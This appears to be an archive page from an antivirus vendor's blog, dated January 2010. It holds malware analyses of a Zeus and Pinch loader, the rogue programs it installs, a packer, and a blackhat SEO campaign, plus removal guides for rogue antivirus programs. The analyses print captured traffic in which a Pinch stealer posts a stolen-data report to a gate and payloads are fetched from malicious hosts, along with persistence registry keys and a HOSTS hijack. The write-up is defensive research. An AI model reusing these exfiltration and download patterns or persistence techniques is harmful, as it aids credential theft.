NoVirusThanks Blog » rogue

Welcome to the jungle: Zeus + Pinch + Rogue Software

admin — Wed, 27 Jan 2010 00:01:55 +0000

This second part of our part 1 analysis, will show you what the files we collected did once live. From the main loader we can extract the following useful strings:

msxslt3.exe
MsXSLT
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
\ntdll.dll
wininet.dll
Content-Type: application/x-www-form-urlencoded
POST
tmpf
\msxslt.dat
Google Bot
explorer.exe
__SYSTEM32_MSXSLT_
svchost.exe
\\.\pipe\_SYSTEM_MSXML_RUN_
ftpdata=1&user=%s&pass=%s&host=%s
SeDebugPrivilege

We can see various references to a file name msxslt3.exe and it is possible to notice that it will be added in the registry startup key Run\MsXSLT. We can see the malware will send out data to an external website using the method “POST” and we can see also a reference to “Google Bot”, that is probably the user agent that will be used by the malware to execute the POST query.

The reference “__SYSTEM32_MSXSLT_” should be the name of the mutex that will be created to limit the malware to run a single time in the infected system. The two processes name “explorer.exe” and “svchost.exe” are the processes the malware will inject code to. And finally we can see an interesting string:

1	ftpdata=1&user=%s&pass=%s&host=%s

From the above string, we can assume the malware will send data to an ftp server (ftpdata=1) and it will be passed 3 variables, respectively the username, the password and the hostname.

From the other unpacked file, we can extract following data:

wget 3.0
Click here to protect your computer from spyware!
Application cannot be executed. The file is infected. Please activate your antivirus software.
WARNING
Advanced Virus Remover installed.
SETUP
winupdate.exe
\Internet Explorer\iexplore.exe 
%s\IS15.exe
hxxp://buyinternetsecurity-2010.com/buy/?code=%s
hxxp://buyinternetsecurity-2010.com/?code=%s
C:\Program Files\InternetSecurity2010\IS2010.exe
AcroRd32.exe
rstrui.exe
CloneCD.exe
cmd.exe
digitaleditions.exe
freecell.exe
FullTiltPoker.exe
GOM.exe
hrtzzm.exe
Icq.exe
Illustrator.exe
miranda32.exe
control.exe
notepad.exe
calc.exe
Attention! System detected a potential hazard (TrojanSPM/LX) on your computer that may infect executable files. You private information and PC safety is at risk. To get rid of unwanted spyware and keep your computer safe you need update your current security software. Click OK to download official intrusion detection system (IDS software)
WARNING
%s\%d.exe
hxxp://testavrdown.com/cgi-bin/get.pl?l=%s
hxxp://vs-codec-pro.net/form.php?code=%s
Windows can`t play the folowing media formats: AVI;WMV;AVS;FLV;MKV;MOV;3GP;MP4;MPG;MPEG;MP3;AAC;WAV;WMA;CDA;FLAC;M4A;MID. Update your video and sound codec to resolve this issue.
Fatal Error
regsvr32 /s %s
%s\helper32.dll
hxxp://downloadavr25.com/dfghfghgfj.dll
hxxp://downloadavr25.com/cgi-bin/download.pl?code=%s
hxxp://downloadavr25.com/loads.php?code=%s
%s\warning.html
Spyware Alert!
winlogon32.exe
smss32.exe
Software\Microsoft\Windows\CurrentVersion\Run
%s%s
%s\winlogon32.exe
%s\smss32.exe
NoActiveDesktopChanges
NoChangingWallpaper
Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
NoSetActiveDesktop
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
DisableTaskMgr
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\IS2010
Software\AVR
Software\RealAV
Userinit
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
userinit.exe
Software\AntivirusXP
faa56ae0-fc64-41fc-b286-fed9abcd401e
Software
8636065b-fef0-4255-b14f-54639f7900a4

We can see from the data above that the file in question is the executable of the rogue security software named IS2010.exe (Internet Security 2010). We can see that this rogue will install files in system directories, will hijack the registry disabling the task manager and other important features, will hijack the execution of pre-defined processes or files (such as regedit.exe or movie files), and will show fake security warnings when an user run the specific processes or try to watch a movie. The alerts that should be generated when an user try to open the “blacklisted” processes or when try to play a movie are the following:

1
2

Application cannot be executed. The file is infected. Please activate your antivirus software.
Windows can`t play the folowing media formats: AVI;WMV;AVS;FLV;MKV;MOV;3GP;MP4;MPG;MPEG;MP3;AAC;WAV;WMA;CDA;FLAC;M4A;MID. Update your video and sound codec to resolve this issue.

Fake alert in action:

We can also see all the text that is used in the false security warnings started by this rogue. The user agent that the malware will use to query the malicious website downloadavr25(dot)com is “wget 3.0″ and if we try to query the website with a different user agent, then the website should deny our query.

An interesting thing is that we can see also references to registry keys and files that are not related to Internet Security 2010 but are related to other rogue security software:

1
2
3

Software\AVR
Software\RealAV
Software\AntivirusXP

We have noticed also a very interesting data inside the unpacked executable that looks like a obfuscaped javascript code:

The content of the above ofuscated javascript code is copied by the malware in the file warning.html that is placed in the system32 folder.

When the main loader is executed, it creates the following files:

C:\DOCUME~1\user\LOCALS~1\Temp\teste1_p.exe
C:\DOCUME~1\user\LOCALS~1\Temp\q1.exe
C:\DOCUME~1\user\LOCALS~1\Temp\avto.exe
C:\DOCUME~1\user\LOCALS~1\Temp\6_ldry3.exe
C:\DOCUME~1\user\LOCALS~1\Temp\5_odbn0.exe
C:\DOCUME~1\user\LOCALS~1\Temp\4_pinnew.exe
C:\DOCUME~1\user\LOCALS~1\Temp\2_load.exe
C:\DOCUME~1\user\LOCALS~1\Temp\0_11adwara.exe
C:\WINDOWS\system32\sdra64.exe
C:\DOCUME~1\user\LOCALS~1\Temp\60325cahp25ca0.exe
C:\WINDOWS\system32\lowsec
C:\WINDOWS\system32\lowsec\local.ds
C:\WINDOWS\system32\lowsec\user.ds
C:\WINDOWS\system32\smss32.exe
C:\WINDOWS\system32\winlogon32.exe
C:\WINDOWS\svc.exe
C:\WINDOWS\odbn0.exe
C:\WINDOWS\system32\helper32.dll
C:\WINDOWS\system32\IS15.exe
C:\DOCUME~1\user\LOCALS~1\Temp\60325cahp25ca2.exe
C:\WINDOWS\system32\41.exe
C:\DOCUME~1\user\LOCALS~1\Temp\60325cahp25ca1.exe
C:\DOCUME~1\user\LOCALS~1\Temp\60325cahp25caa.exe
C:\WINDOWS\lsass.exe
C:\Program Files\InternetSecurity2010
C:\DOCUME~1\user\LOCALS~1\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT
C:\Program Files\InternetSecurity2010\IS2010.exe
C:\DOCUME~1\user\Desktop\Internet Security 2010.lnk
C:\DOCUME~1\user\Start Menu\Internet Security 2010.lnk
C:\DOCUME~1\user\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Security 2010.lnk
C:\DOCUME~1\user\user\Start Menu\Internet Security 2010.lnk
C:\DOCUME~1\user\Start Menu\Internet Security 2010.lnk
C:\DOCUME~1\user\Application Data\Microsoft\Internet Explorer\Quick Launch\Internet Security 2010.lnk
C:\WINDOWS\system32\18467.exe

Note that all the above files were created during a 24 hours time from the first run of the main loader. The loader adds most of the recently created executable files to the registry startup keys to make sure all the malicious files are started everytime Windows is booted.

We can see a screenshot of malicious running processes:

This is a screenshot of all created files:

From the files that have been created we can see that the loader installs a lot of malicious files, in particular we can see that it is installed the famous ZeuS Trojan (sdra64.exe), the rogue security software Internet Security 2010 (IS2010.exe), BHOs (helper32.dll), the famous Pinch Trojan (4_pinnew.exe) and other very dangerous kind of trojans in the Temp folder.

We have noticed also various ring3 API hooks installed by sdra64.exe and other executables that hide their presence in the system by making hidden the files from the regular explorer searches and from all the other file searches made by user-mode applications. The files are also hidden from the task manager since the process of Zeus sdra64.exe is hidden too.

The infected system is now esposed to a very high risk of sensitive data theft and of being used as fraudulent base to host malicious files or to launch attacks such as DDoS or malware spreading on famous P2P platforms like eMule and Torrents. In particular what make the computer at a very risk of data theft are the two famous trojans used mainly only to steal Bank Accounts, Credit Cards Details, Identity and to keystroke everything that is typed by the keyboard:

Zeus Trojan
Pinch Trojan

After the hidden execution of the rogue security software Internet Security 2010 the system started to become very unstable. Most executables that are generally used to analyze the system such as regedit.exe and taskmgr.exe could not be started:

A very simple and quick workaround fix to be able to run regedit.exe and taskmgr.exe is to copy the files under C:\ and rename them respectively:

1 2	C:\regedit.exe -> C:\r.exe C:\taskmgr.exe -> C:\t.exe

Now it will be possible to inspect the registry with r.exe (regedit) and check running processes with t.exe (taskmgr). Also a lot of other files related to freeware and commercial applications of any gender, from security software to video conversion software, could not be started and when the user try to run a “blacklisted” process, the rogue software will start to show aggressive fake security warnings stating the file is infected.

From these images we can clearly see the rogue security software Internet Security 2010 in action during a fake system scan and when it display the fake security warnings stating the system is infected by a huge number of trojans (even if in this case is true LOL):

This is a part of the logged network traffic during the malware infection:

GET /lightbox/js/r/files/tasks/AC HTTP/1.1
Host: sexzoznamka.eu
 
GET /lightbox/js/r/robo.php?r=1 HTTP/1.1
Host: sexzoznamka.eu
 
GET /cgi-bin/download.pl?code=0000093 HTTP/1.1
User-Agent: wget 3.0
Host: downloadavr30.com
 
GET /dfghfghgfj.dll HTTP/1.1
User-Agent: wget 3.0
Host: downloadavr30.com
 
GET /loads.php?code=0000093 HTTP/1.1
User-Agent: wget 3.0
Host: downloadavr30.com
 
GET /lightbox/js/r/robo.php?r=4 HTTP/1.1
Host: sexzoznamka.eu
 
GET /cgi-bin/get.pl?l=0000093 HTTP/1.1
User-Agent: wget 3.0
Host: testavrdown.com
 
UDP:53 -> autouploaders.net
UDP:53 -> sruprekut.net
UDP:53 -> greatinstant.net
 
GET /mass/tds2.php HTTP/1.1
Host: autouploaders.net
 
GET /123.exe HTTP/1.1
Host: plugininput.com
 
GET /nop/tds2.php HTTP/1.1
Host: saloongins.net
 
GET /in.cgi?16 HTTP/1.1
Host: promotds.com
 
GET /pi.php HTTP/1.1
Host: kingsizematures.com
 
GET / HTTP/1.1
Host: interno-porn.com
 
GET /pi.php HTTP/1.1
Host: interno-porn.com
 
GET /lightbox/js/r/robo.php?r=5 HTTP/1.1
Host: sexzoznamka.eu
 
POST /gate/gate.php HTTP/1.0
Host: moretds.in
Content-Length: 1612
a=vaska_1@123mail.ru&b=pinch3_report&d=report.bin&c=xxx
 
GET /out.php?t=3.0.2.231&url=xxx=&s=3 HTTP/1.1
Host: interno-porn.com
 
GET / HTTP/1.1
Host: www.nasty-xx.net
 
GET /js2/33311.php?view=h HTTP/1.1
Host: pages.etology.com
 
GET /transformer/v4/ads2.js HTTP/1.1
Host: media.etology.com
 
GET /search.php?qq=xxx HTTP/1.1
Host: getgreatguide.in
 
GET /s/exx.php HTTP/1.1
Host: getgreatguide.in

From the above traffic we can see that the malware uses the domain

1 2	GET /lightbox/js/r/robo.php?r=1 HTTP/1.1 Host: sexzoznamka.eu

To launch commands, infact we can see that the number:

1	robo.php?r=1

Change based on the traffic received or sent, so we presume it change everytime a specific action has been terminated and by changing the number it will start a new action associated with the number.

We can see various domains used to spread the TDSS trojan:

1
2
3

GET /mass/tds2.php HTTP/1.1
GET /123.exe HTTP/1.1
GET /nop/tds2.php HTTP/1.1

And we can also see that a domain is used for receive the report that contains all the sensitive data stolen from the infected computer, the data is then sent to a specific email address:

POST /gate/gate.php HTTP/1.0
Host: moretds.in
Content-Length: 1612
a=vaska_1@123mail.ru&b=pinch3_report&d=report.bin&c=xxx

The above data can identify the traffic generated by the Pinch trojan.

We can also see the domain from which the malware has downloaded the files related to the rogue software Internet Security 2010:

1
2
3

GET /loads.php?code=0000093 HTTP/1.1
User-Agent: wget 3.0
Host: downloadavr30.com

We have scanned the infected computer with Hijack Hunter and below there are all the malware traces extracted from the log file:

[+] Running processes
 
C:\DOCUME~1\user\LOCALS~1\teste1_p.exe (354304 bytes) (Unknown) (f49588f405759025573272186038ffc5)
C:\DOCUME~1\user\LOCALS~1\q1.exe (293888 bytes) (Unknown) (811805ec29c6f3e0e479e0e8bad9dbff)
C:\WINDOWS\system32\smss32.exe (18944 bytes) (Unknown) (3aa2b2dbb73cebcb67f6e0ef2ce313d1)
C:\Program Files\InternetSecurity2010\IS2010.exe (1117184 bytes) (Internet Security) (d86468b427a31d2c6348256f7a1a03a7)
C:\DOCUME~1\user\LOCALS~1\5_odbn0.exe (295424 bytes) (Unknown) (c70ba51397f3ef815589cd4917699b15)
C:\Program Files\InternetSecurity2010\IS2010.exe (1117184 bytes) (Internet Security) (d86468b427a31d2c6348256f7a1a03a7)
 
[+] Registry startups
 
Value: smss32.exe
Data: C:\WINDOWS\system32\smss32.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: netc
Data: C:\WINDOWS\svc.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: odbny0
Data: C:\WINDOWS\odbn0.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: lsass
Data: C:\WINDOWS\lsass.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: Internet Security 2010
Data: C:\Program Files\InternetSecurity2010\IS2010.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 
Value: Userinit
Data: C:\WINDOWS\system32\winlogon32.exe,C:\WINDOWS\system32\sdra64.exe,
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
 
[+] Windows Firewall allowed programs
 
Value: C:\DOCUME~1\user\LOCALS~1\4_pinnew.exe
Data: C:\DOCUME~1\user\LOCALS~1\4_pinnew.exe:*:Enabled:Enabled
Key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
 
[+] Windows Hijacks
 
Value: DisableTaskMgr
Data: 1
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
 
Value: NoChangingWallpaper
Data: 1
Key: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
 
Value: NoChangingWallpaper
Data: 1
Key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop
 
[+] Executables in Temp folders
 
C:\DOCUME~1\user\LOCALS~1\0_11adwara.exe (18944 bytes) (Unknown) (3aa2b2dbb73cebcb67f6e0ef2ce313d1)
C:\DOCUME~1\user\LOCALS~1\4_pinnew.exe (44032 bytes) (Unknown) (4b4440b36ec91d2ca8084735760109fd)
C:\DOCUME~1\user\LOCALS~1\5_odbn0.exe (295424 bytes) (Unknown) (c70ba51397f3ef815589cd4917699b15)
C:\DOCUME~1\user\LOCALS~1\60325cahp25caa.exe (2661888 bytes) (Unknown) (6411876d41f55fa21003afe9256b24d2)
C:\DOCUME~1\user\LOCALS~1\6_ldry3.exe (84992 bytes) (Unknown) (180ef4d8f204fdd201909f06ed174a8b)
C:\DOCUME~1\user\LOCALS~1\avto.exe (295936 bytes) (Unknown) (a66bbd3944586e428029533e3ce80d60)
C:\DOCUME~1\user\LOCALS~1\q1.exe (293888 bytes) (Unknown) (811805ec29c6f3e0e479e0e8bad9dbff)
C:\DOCUME~1\user\LOCALS~1\teste1_p.exe (354304 bytes) (Unknown) (f49588f405759025573272186038ffc5)
 
[+] TCP Connections
 
smss32.exe -> 127.0.0.1:1042 -> 193.104.153.30:80 -> CLOSE_WAIT
q1.exe -> 127.0.0.1:1050 -> 89.248.172.136:80 -> ESTABLISHED
q1.exe -> 127.0.0.1:1052 -> 89.248.168.69:80 -> ESTABLISHED

Unpacking Mystic Compressor used to pack Rogue Software

admin — Tue, 26 Jan 2010 23:53:46 +0000

Today we will analyze a sample of a rogue security software that is packed by an unknown packer named Mystic Compressor, and that has been identified to be used mostly to pack rogue security software executables.

Steve has successfully unpacked the sample and this is his analysis:

Call to VirtualProtect to make the data in the first section writable/decryptable. For some reason it spaces pushing the parameters for the call inbetween other API calls.

Simple decryption loop and more pointless(?) API calls.

Call to a Call which calls the second decrypter stub.

Second stub, memory allocation and more decryption, nothing worth noting.

Now at the JMP to the decrypted third stub, which was allocated at 0xA00000. In the hex dump you can clearly see the string “Mystic Compressor”.

More memory allocation and yet more decryption, basically the same as before.

Now at 0xA10000, the forth and final stub.

Goes thru more decryption and finally lands on a RETN 4, which takes us to the OEP.

OEP of the packed file.

Conclusion:

Lack of anti debugging made this packer fairly easy to analyze. But, I have found 3 other samples on MDL in the last few days that were packed with it so it must be popular. One file I found was a packed version of MicroJoiner, which dropped 8 files which were also packed with Mystic.

From the unpacked files, we can extract very interesting data that can help us to statically know or understand for what can be used the single files from the malware.

Visit the following link to read the second part of this article where we conduct a static analysis of the malware, and explain how dangerous the effects of these infections can be: Welcome to the jungle: Zeus + Pinch + Rogues

How to remove Desktop Security 2010 (Uninstall instructions)

admin — Sun, 24 Jan 2010 13:18:15 +0000

Desktop Security 2010 is a rogue security software, it is a false anti-spyware application that is generally installed in the user’s computer by dangerous trojans (such as Zlob and false video codecs), but it can also be installed manually by the victim.

Once your computer is infected with this parasite, it will immediately displays security warnings, alerts and system scans stating that your computer is heavily infected. These warnings are all false and are only displayed to make you think your computer is truly infected and that it is necessary to buy the full version of the software to remove the so-called infections.

Make sure to not fall in this scam, if your computer is infected with Desktop Security 2010, it is recommended to remove it immediately and to scan your system with a real security software.

Symptoms of infection

The process Desktop Security 2010.exe is running in your system
Slow computer performance
Repeated security warnings, alerts and system scans
Web sites that suddenly are shown on your desktop

When the program is executed, it creates the following files:

%ProgramFiles%\Desktop Security 2010
%ProgramFiles%\Desktop Security 2010\daily.cvd
%ProgramFiles%\Desktop Security 2010\Desktop Security 2010.exe
%ProgramFiles%\Desktop Security 2010\guide.chm
%ProgramFiles%\Desktop Security 2010\hjengine.dll
%ProgramFiles%\Desktop Security 2010\mfc71.dll
%ProgramFiles%\Desktop Security 2010\MFC71ENU.DLL
%ProgramFiles%\Desktop Security 2010\msvcp71.dll
%ProgramFiles%\Desktop Security 2010\msvcr71.dll
%ProgramFiles%\Desktop Security 2010\pthreadVC2.dll
%ProgramFiles%\Desktop Security 2010\securitycenter.exe
%ProgramFiles%\Desktop Security 2010\taskmgr.dll
%ProgramFiles%\Desktop Security 2010\uninstall.exe
%AllUsers%\Start Menu\Programs\Desktop Security 2010
%AllUsers%\Start Menu\Programs\Desktop Security 2010.lnk
%AllUsers%\Start Menu\Programs\Desktop Security 2010\Activate Desktop Security 2010.lnk
%AllUsers%\Start Menu\Programs\Desktop Security 2010\Desktop Security 2010.lnk
%AllUsers%\Start Menu\Programs\Desktop Security 2010\Help Desktop Security 2010.lnk
%AllUsers%\Start Menu\Programs\Desktop Security 2010\How to Activate Desktop Security 2010.lnk
%User%\Application Data\Microsoft\Internet Explorer\Quick Launch\Desktop Security 2010.lnk

The program creates the following registry entries:

HKLM\SOFTWARE\Desktop Security 2010
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Desktop Security 2010
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Desktop Security 2010
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityCenter

How to remove Desktop Security 2010 (manual removal) ?

Terminate all the Desktop Security 2010 processes
Unregister all the Desktop Security 2010 DLLs
Delete all the Desktop Security 2010 files
Delete all the Desktop Security 2010 registry entries

How to remove Desktop Security 2010 (automatic removal) ?

Scan your system with NoVirusThanks Malware Remover

How to remove Win Security 360 (Uninstall instructions)

admin — Sun, 24 Jan 2010 13:07:58 +0000

Win Security 360 is a rogue security software, it is a false anti-spyware application that is generally installed in the user’s computer by dangerous trojans (such as Zlob and false video codecs), but it can also be installed manually by the victim.

Make sure to not fall in this scam, if your computer is infected with Win Security 360, it is recommended to remove it immediately and to scan your system with a real security software.

Symptoms of infection

The process WinSecurity360.exe is running in your system
Slow computer performance
Repeated security warnings, alerts and system scans
Web sites that suddenly are shown on your desktop

Malicious websites and urls:

1 2	Winsecurity360.com Security360update.com

When the program is executed, it creates the following files:

%ProgramFiles%\WinSecurity360
%ProgramFiles%\WinSecurity360\WinSecurity360.exe
%ProgramFiles%\WinSecurity360\Win Security 360 Help.url
%ProgramFiles%\WinSecurity360\Win Security 360.url
%User%\Application Data\WinSecurity360
%User%\Application Data\WinSecurity360\vlc.dat
%User%\Application Data\WinSecurity360\WinSecurity360.ini
%User%\Start Menu\Programs\Win Security 360
%User%\Start Menu\Programs\Startup\Win Security 360.lnk
%User%\Start Menu\Programs\Win Security 360\Website.lnk
%User%\Start Menu\Programs\Win Security 360\Win Security 360 Help.lnk
%User%\Start Menu\Programs\Win Security 360\Win Security 360.lnk
%User%\Desktop\Win Security 360.lnk

How to remove Win Security 360 (manual removal) ?

Terminate all the Win Security 360 processes
Unregister all the Win Security 360 DLLs
Delete all the Win Security 360 files
Delete all the Win Security 360 registry entries

How to remove Win Security 360 (automatic removal) ?

Scan your system with NoVirusThanks Malware Remover

Blackhat SEO Campaign targets Security Software

admin — Sat, 23 Jan 2010 17:00:26 +0000

Recently, while I was searching on google for some security software related keywords, I have noticed a massive attempt of Blackhat SEO strategy used to capture users that search for keywords related to various security software.

When clicking on any of these links the user is generally redirected to the malicious links that are used to capture new keywords, details of the user that visits the links, how many users have visited the links and many other info.

Not all the links are used to redirect the users to malicious websites that promote rogue security software, maybe because the Blackhat SEO campaign is at its beginning stage and it is used to collects some specific details, such as what are the compromised websites that can generate the most traffic, the country of origin of the users, or to simply make sure to gain the first results on a Google search. All the collected details can be used then to start a very powerful attack that can assure a very big percentage of infected users.

We had some luck and we have found some links that have already started to redirect users to very dangerous websites that show a lot of aggressives security warnings and false system scans stating your computer is infected with a huge number of trojans. When the user clicks with the mouse on the website in any point, it is immediately prompted to download an executable file of a rogue security software to remove the so-called infections.

Below there is network traffic with malicious websites:

GET /in.php?t=cc&h=acornwiki.com&p=xxx HTTP/1.1
Host: merin22.mooo.com
 
HTTP/1.1 302 Found
Location: hxxp://gink22hok.com/?uid=195&pid=3&ttl=51e48633529
 
GET /?uid=195&pid=3&ttl=51e48633529 HTTP/1.1
Host: gink22hok.com
 
HTTP/1.1 302 Found
Location: hxxp://www1.allstaffdefender.com/?p=xxx
 
GET /Scripts/Strategies/6a32aaf2501cb37bf18e746c5d2eddcb503004011.js
Host: www1.allstaffdefender.com
 
GET /build6_195.php?cmd=getFile&counter=2&p=xxx HTTP/1.1
Host: www1.yourstaffdefender.com
 
HTTP/1.1 200 OK
Pragma: hack
Content-Length: 254976
Content-Disposition: attachment; filename=packupdate_build6_195.exe
Content-Transfer-Encoding: binary
Set-Cookie: ds=1

From the above traffic, we can see that the malicious website loads the script:

1	6a32aaf2501cb37bf18e746c5d2eddcb503004011.js

And then it has immediately redirected us to the file to download named packupdate_build6_195.exe, that is the setup file of the rogue security software named LivePC Guard. When the program is executed, it creates the following files in the system:

%AllUsers%\Application Data\3dfcb0e
%AllUsers%\Application Data\3dfcb0e\LivePCGuard.exe
%AllUsers%\Application Data\3dfcb0e\LP3dfc.exe
%User%\LOCALS~1\Temp\del.bat
%AllUsers%\Application Data\3dfcb0e\sqlite3.dll
%AllUsers%\Application Data\3dfcb0e\mozcrt19.dll
%AllUsers%\Application Data\LPPKCG
%AllUsers%\Application Data\LPPKCG\LPMMIPCG.cfg
C:\WINDOWS\system32\drivers\etc\host_new
%User%\Application Data\Live PC Care
%AllUsers%\Application Data\3dfcb0e\Quarantine Items
%AllUsers%\Application Data\3dfcb0e\LPCGSys
%AllUsers%\Application Data\3dfcb0e\LPCGSys\vd952342.bd

The program hijacks the HOSTS file:

74.125.45.100 4-open-davinci.com
74.125.45.100 securitysoftwarepayments.com
74.125.45.100 privatesecuredpayments.com
74.125.45.100 secure.privatesecuredpayments.com
74.125.45.100 getantivirusplusnow.com
74.125.45.100 secure-plus-payments.com
74.125.45.100 www.getantivirusplusnow.com
74.125.45.100 www.secure-plus-payments.com
74.125.45.100 www.getavplusnow.com
74.125.45.100 safebrowsing-cache.google.com
74.125.45.100 urs.microsoft.com
74.125.45.100 www.securesoftwarebill.com
74.125.45.100 secure.paysecuresystem.com
74.125.45.100 paysoftbillsolution.com
74.125.45.100 protected.maxisoftwaremart.com
84.19.171.5 google.ae
84.19.171.5 google.as
84.19.171.5 google.at
84.19.171.5 google.az
84.19.171.5 google.ba
84.19.171.5 google.be
84.19.171.5 google.bg
84.19.171.5 google.bs
...

We have noticed new connections to other malicious websites:

GET /index.php?controller=hash HTTP/1.1
Host: newsystem-guard.in
 
HEAD /index.php?controller=microinstaller&abbr=LPCG HTTP/1.1
Host: newsystem-guard.in
 
GET /Reports/MicroinstallServiceReport.php?p=xxx HTTP/1.1
Host: securityearth.cn
 
GET /?abbr=LPCG&pid=3 HTTP/1.1
Host: pay1.livepcguard.com
 
HEAD / HTTP/1.1
User-Agent: Lp3dfc
Host: livepcguard.com
 
HEAD / HTTP/1.1
User-Agent: Lp3dfc
Host: safetyearth.net
 
HEAD / HTTP/1.1
User-Agent: Lp3dfc
Host: newsystem-guard.in
 
GET /?abbr=LPCG&pid=3 HTTP/1.1
Host: pay2.livepcguard.com
 
HEAD / HTTP/1.1
User-Agent: Lp3dfc
Host: protectedfield.in
 
GET /?abbr=LPCG&pid=3 HTTP/1.1
Host: paymentsafety.net
 
GET /Reports/install-report.php/?abbr=LPCG&wv=wvXP HTTP/1.1
Host: safetyearth.net
 
GET /Reports/SoftServiceReport.php?verint=645&wv=wvXP HTTP/1.1
Host: safetyearth.net
 
HEAD / HTTP/1.1
User-Agent: Lp3dfc
Host: update1.livepcguard.com
 
HEAD / HTTP/1.1
User-Agent: Lp3dfc
Host: mysecurityland.com
 
HEAD / HTTP/1.1
User-Agent: Lp3dfc
Host: update2.livepcguard.com

From the traffic above we can see that the program has established some connections with fraudulent payment systems and started to receive the fraudulent HTML templates that are displayed to the user and where is asked the user to insert sensitive data, such as credit card details, needed to buy the rogue security program.

Keywords used in the Blackhat SEO strategy:

trespass.php?be=free-online-virus-protection
labora.php?ate=online-virus-scan-free
scuffle.php?un=free-online-malware-scan
gleek.php?kip=free-malware-scanner
trespass.php?be=free-online-virus-protection
domesday.php?om=free-spyware-scanner
noobe.php?bal=avg-free-virus-scanner
ingesta.php?cb=free-conficker-scan
sucrose.php?va=free-anti-rootkit
jib.php?hew=bandwidth-test-free
rudd.php?auf=free-spyware-and-adware-removal
metritis.php?ugh=activex-free-install
colaptes.php?mem=adware-removal-free
jib.php?hew=free-virus-patch
edged.php?yea=free-spy-doctor
mammal.php?be=conficker-virus-free-removal
gleek.php?kip=norton-firewall-free
serratus.php?lb=ad-aware-se-free-download
ersatz.php?ben=avg-spyware-free
eile.php?jib=norton-virus-free-trial
anaphase.php?toy=free-keylogger-program
colaptes.php?mem=free-popup-blocker
ingesta.php?cb=free-spybot-downloads
sucrose.php?va=free-bootable-cd
aden.php?x=free-online-malware-scan
chinked.php?pee=online-virus-scan-free
timeful.php?rou=free-mcafee-online-virus-scan
lipase.php?few=free-virus-scan-mac

Be always careful while searching for any kind of keywords and make sure to check the links before click on them. We suggest to browse the Internet with Mozilla Firefox and with the addon NoScript.

How to remove SysDefenders (Uninstall instructions)

admin — Fri, 22 Jan 2010 01:05:58 +0000

SysDefenders is a rogue security software, it is a false anti-spyware application that is generally installed in the user’s computer by dangerous trojans (such as Zlob and false video codecs), but it can also be installed manually by the victim.

Make sure to not fall in this scam, if your computer is infected with SysDefenders, it is recommended to remove it immediately and to scan your system with a real security software.

Symptoms of infection

The process SysDefenders.exe is running in your system
Slow computer performance
Repeated security warnings, alerts and system scans
Web sites that suddenly are shown on your desktop

When the program is executed, it creates the following files:

C:\Program Files\SysDefenders Software
C:\Program Files\SysDefenders Software\SysDefenders
C:\Program Files\SysDefenders Software\SysDefenders\main_config.xml
C:\Program Files\SysDefenders Software\SysDefenders\SysDefenders.exe
C:\Program Files\SysDefenders Software\SysDefenders\uninstall.exe
%AllUsers%\Desktop\SysDefenders.lnk
%AllUsers%\Start Menu\Programs\SysDefenders
%AllUsers%\Start Menu\Programs\SysDefenders\1 SysDefenders.lnk
%AllUsers%\Start Menu\Programs\SysDefenders\2 Homepage.lnk
%AllUsers%\Start Menu\Programs\SysDefenders\3 Uninstall.lnk

The program creates the following registry entries:

HKCU\Software\SysDefenders
HKLM\SOFTWARE\SysDefenders
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SysDefenders
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysDefenders

How to remove SysDefenders (manual removal) ?

Terminate all the SysDefenders processes
Unregister all the SysDefenders DLLs
Delete all the SysDefenders files
Delete all the SysDefenders registry entries

How to remove SysDefenders (automatic removal) ?

Scan your system with NoVirusThanks Malware Remover

How to remove DefendAPc (Uninstall instructions)

admin — Fri, 22 Jan 2010 01:01:09 +0000

DefendAPc is a rogue security software, it is a false anti-spyware application that is generally installed in the user’s computer by dangerous trojans (such as Zlob and false video codecs), but it can also be installed manually by the victim.

Make sure to not fall in this scam, if your computer is infected with DefendAPc, it is recommended to remove it immediately and to scan your system with a real security software.

Symptoms of infection

The process DefendAPc.exe is running in your system
Slow computer performance
Repeated security warnings, alerts and system scans
Web sites that suddenly are shown on your desktop

When the program is executed, it creates the following files:

C:\Program Files\DefendAPc Software
C:\Program Files\DefendAPc Software\DefendAPc
C:\Program Files\DefendAPc Software\DefendAPc\DefendAPc.exe
C:\Program Files\DefendAPc Software\DefendAPc\main_config.xml
C:\Program Files\DefendAPc Software\DefendAPc\uninstall.exe
%AllUsers%\Desktop\DefendAPc.lnk
%AllUsers%\Start Menu\Programs\DefendAPc
%AllUsers%\Start Menu\Programs\DefendAPc\1 DefendAPc.lnk
%AllUsers%\Start Menu\Programs\DefendAPc\2 Homepage.lnk
%AllUsers%\Start Menu\Programs\DefendAPc\3 Uninstall.lnk

The program creates the following registry entries:

HKCU\Software\DefendAPc
HKLM\SOFTWARE\DefendAPc
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DefendAPc
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DefendAPc

How to remove DefendAPc (manual removal) ?

Terminate all the DefendAPc processes
Unregister all the DefendAPc DLLs
